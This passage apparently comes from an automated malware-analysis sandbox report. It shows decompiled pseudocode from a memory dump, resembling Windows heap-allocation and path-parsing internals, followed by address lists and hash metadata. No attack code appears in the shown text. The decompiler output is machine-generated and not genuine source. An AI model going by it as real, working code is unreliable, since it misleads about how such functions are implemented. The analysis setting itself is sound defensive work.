												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E05006DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E0500F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E0500F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E0500F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E0500FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E0500FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E0500F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E0500F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E05094CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E0501D130(_t427, _t494, _t511);
				}
			}

0x05095ba5
0x05095baa
0x05095baf
0x05095bb4
0x05095bb6
0x05095bbc
0x05095bbe
0x05095bc4
0x05095bcd
0x05095bd3
0x05095bd6
0x05095bdc
0x05095be0
0x05095be3
0x05095beb
0x05095bf2
0x05095bf8
0x05095bfe
0x05095c04
0x05095c0e
0x05095c18
0x05095c1f
0x05095c25
0x05095c2a
0x05095c2c
0x05095c32
0x05095c3a
0x05095c3f
0x05095c42
0x05095c48
0x05095c5b
0x05095c5b
0x05095c2c
0x05095cb7
0x05095cb9
0x05095cbf
0x05095cc2
0x05095cca
0x05095ccb
0x05095ccb
0x05095cd1
0x05095cd7
0x05095cda
0x05095ce1
0x05095ce4
0x05095ce7
0x05095ced
0x05095cf3
0x05095cf9
0x05095cff
0x05095d08
0x05095d0a
0x05095d0e
0x05095d10
0x00000000
0x00000000
0x05095d16
0x05095d1a
0x00000000
0x00000000
0x05095d20
0x05095d22
0x05095d25
0x05095d2f
0x05095d2f
0x05095d33
0x05095d3d
0x05095d49
0x05095d4b
0x00000000
0x00000000
0x05095d5a
0x05095d5d
0x05095d60
0x00000000
0x00000000
0x05095d66
0x05095d69
0x00000000
0x00000000
0x05095d6f
0x05095d6f
0x05095d73
0x05095d79
0x05095d7f
0x05095d86
0x05095d95
0x05095d98
0x05095dba
0x05095dcb
0x05095dce
0x05095dd3
0x05095dd6
0x05095dd8
0x05095de6
0x05095dec
0x05095dee
0x05095df1
0x05095df3
0x0509635a
0x0509635a
0x00000000
0x0509635a
0x05095dfe
0x05095e02
0x05095e05
0x05095e07
0x05095e10
0x05095e13
0x05095e1b
0x05095e1c
0x05095e21
0x05095e22
0x05095e23
0x05095e25
0x05095e2a
0x05095e2c
0x05095e2e
0x05095e36
0x05095e39
0x05095e42
0x05095e47
0x05095e4d
0x05095e54
0x05095e54
0x05095e54
0x05095e2e
0x05095e5c
0x05095e5f
0x05095e62
0x05095e64
0x05095e6b
0x05095e70
0x05095e7a
0x05095e7a
0x05095e7a
0x05095e6b
0x05095e7e
0x05095e7f
0x05095e7f
0x05095e81
0x05095e87
0x05095e8b
0x05095e8c
0x05095e8c
0x05095e8c
0x05095e9a
0x05095e9c
0x05095ea2
0x05095ea6
0x05095f50
0x05095f50
0x05095f57
0x05095f66
0x05095f66
0x05095f66
0x05095f68
0x05095f6a
0x050963d0
0x00000000
0x05095f70
0x05095f70
0x05095f91
0x05095f9c
0x05095f9e
0x05095fa4
0x05095fa6
0x0509638c
0x05096392
0x050963a1
0x050963a7
0x050963af
0x050963af
0x050963bd
0x050963d8
0x00000000
0x050963d8
0x05095fac
0x05095fb2
0x05095fb4
0x05095fbd
0x05095fc6
0x05095fce
0x05095fd4
0x05095fdc
0x05095fec
0x05095fed
0x05095fee
0x05095fef
0x05095ff9
0x05095ffa
0x05095ffb
0x05095ffc
0x05096000
0x05096004
0x05096012
0x05096012
0x05096018
0x05096019
0x0509601a
0x0509601b
0x0509601c
0x05096020
0x05096059
0x0509605c
0x05096061
0x05096061
0x05096022
0x05096022
0x05096022
0x05096025
0x0509602a
0x0509602b
0x05096031
0x05096037
0x05096038
0x0509603e
0x05096048
0x05096049
0x0509604a
0x0509604b
0x0509604c
0x0509604d
0x05096053
0x05096054
0x05096054
0x05096062
0x05096065
0x05096067
0x0509606a
0x05096070
0x05096075
0x05096076
0x05096081
0x05096087
0x05096095
0x05096099
0x0509609e
0x050960a4
0x050960ae
0x050960b0
0x050960b3
0x050960b6
0x050960b8
0x050960ba
0x050960ba
0x050960ba
0x050960ba
0x050960be
0x050960c0
0x050960c5
0x050960c5
0x050960c5
0x050960c6
0x050960cd
0x05096114
0x050960cf
0x050960cf
0x050960d4
0x050960d5
0x050960da
0x050960db
0x050960e1
0x050960e2
0x050960e8
0x050960f8
0x050960fd
0x050960fe
0x05096102
0x05096104
0x05096107
0x05096109
0x0509610b
0x0509610b
0x0509610b
0x0509610b
0x0509610f
0x0509610f
0x05096117
0x0509611a
0x0509611f
0x05096125
0x05096134
0x05096139
0x0509613f
0x05096146
0x05096148
0x0509614b
0x0509614d
0x0509614f
0x0509614f
0x0509614f
0x0509614f
0x05096153
0x05096159
0x05096159
0x0509615c
0x05096163
0x05096169
0x0509616c
0x05096172
0x05096181
0x05096186
0x05096187
0x0509618b
0x05096191
0x05096195
0x050961a3
0x050961bb
0x050961c0
0x050961c3
0x050961cc
0x050961d0
0x050961dc
0x050961de
0x050961e1
0x050961e4
0x050961e6
0x050961e8
0x050961e8
0x050961e8
0x050961e8
0x050961e6
0x050961ec
0x050961f3
0x05096203
0x05096209
0x0509620a
0x05096216
0x0509621d
0x05096227
0x05096241
0x05096246
0x0509624c
0x05096257
0x05096259
0x0509625c
0x0509625e
0x05096260
0x05096260
0x05096260
0x05096260
0x0509625e
0x05096264
0x05096267
0x05096269
0x05096315
0x05096315
0x0509631b
0x0509631e
0x05096324
0x05096327
0x0509632f
0x05096330
0x05096333
0x0509633a
0x0509633c
0x05096335
0x05096335
0x05096335
0x0509633f
0x05096342
0x0509634c
0x05096352
0x05096355
0x05096355
0x05096359
0x00000000
0x0509626f
0x05096275
0x05096275
0x05096278
0x0509627e
0x0509627e
0x05096281
0x05096287
0x0509628d
0x05096298
0x0509629c
0x050962a2
0x0509629e
0x0509629e
0x0509629e
0x050962a7
0x050962a7
0x050962aa
0x050962b0
0x050962f0
0x050962f0
0x050962f2
0x050962f8
0x050962fd
0x050962b2
0x050962b2
0x050962b2
0x050962b5
0x050962dd
0x050962e2
0x050962e5
0x050962b7
0x050962b8
0x050962bb
0x050962bd
0x050962c0
0x050962c4
0x050962cd
0x050962cd
0x050962c0
0x050962bb
0x050962b5
0x05096302
0x05096303
0x05096305
0x05096305
0x05096305
0x0509630c
0x0509630c
0x00000000
0x0509627e
0x05096269
0x05095eac
0x05095ebb
0x05095ebe
0x05095ecb
0x05095ecb
0x05095ece
0x05095ece
0x05095ed4
0x05095ed7
0x05095ed9
0x05095edb
0x05095edb
0x05095ee1
0x05095ee1
0x05095ee3
0x05095f20
0x05095f20
0x05095ee5
0x05095ee5
0x05095ee5
0x05095ee8
0x05095f11
0x05095f18
0x05095eea
0x05095eea
0x05095eed
0x05095ef2
0x05095ef8
0x05095efb
0x05095f0a
0x05095f0a
0x05095eed
0x05095ee8
0x05095f22
0x05095f28
0x00000000
0x00000000
0x05095f30
0x05095f31
0x05095f37
0x05095f3a
0x05095f3d
0x05095f44
0x00000000
0x00000000
0x00000000
0x05095f46
0x05095f48
0x05095f4d
0x00000000
0x05095f4d
0x05095dda
0x05095ddf
0x00000000
0x05095ddf
0x05095dd8
0x05095da7
0x05095da9
0x05095dac
0x05095dae
0x00000000
0x05095db4
0x05095db4
0x00000000
0x05095db4
0x05095dae
0x05095d88
0x05095d8d
0x05096363
0x05096369
0x0509636a
0x05096370
0x05096372
0x0509637a
0x0509637b
0x0509637d
0x00000000
0x00000000
0x0509637f
0x05096385
0x00000000
0x05096385
0x05095d38
0x05095d3b
0x00000000
0x00000000
0x00000000
0x05095d3b
0x05095d27
0x05095d29
0x00000000
0x00000000
0x00000000
0x05096360
0x00000000
0x05096360
0x05095c10
0x05095c10
0x050963da
0x050963e5
0x050963e5

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55324fdbcc99962ec12e6cddb4591f9f53131f373050309cd27932f5f4892eed
Instruction ID: 2eedc9584686a7c431e8934b3d851e1a3394f1503077b345a3ff0e6b8e1878a8
Opcode Fuzzy Hash: 55324fdbcc99962ec12e6cddb4591f9f53131f373050309cd27932f5f4892eed
Instruction Fuzzy Hash: AE427971A042298FDF68CF68D880BADB7F1FF49304F1481AAD84DAB286D7319985DF50

Uniqueness

Uniqueness Score: -1.00%

Function 04FE4120, Relevance: .4, Instructions: 444
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E04FE4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x50bd360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E04FFF232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E04FE6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L04FE4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E04FE6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M04FE45F8))) {
												case 0:
													_v568 = 0x4fa1078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x4fa11c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L04FE4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E0500F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E0500F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
